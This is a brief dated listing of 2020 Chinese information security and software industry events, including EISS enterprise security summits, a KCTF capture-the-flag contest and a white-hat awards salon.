2020-11-27

EISS-2020企业信息安全峰会之上海站 11.27

2020-09-24

CSDI summit中国软件研发管理行业技术峰会

2020-09-23

2020中国国际智慧能源暨能源数据中心与网络信息安全装备展览会

2020-07-31

EISS-2020企业信息安全峰会之北京站 | 7.31(周五线上)

2020-04-15

看雪.安恒 2020 KCTF 春季赛

2020-01-09

相约本地生活安全沙龙暨白帽子颁奖典礼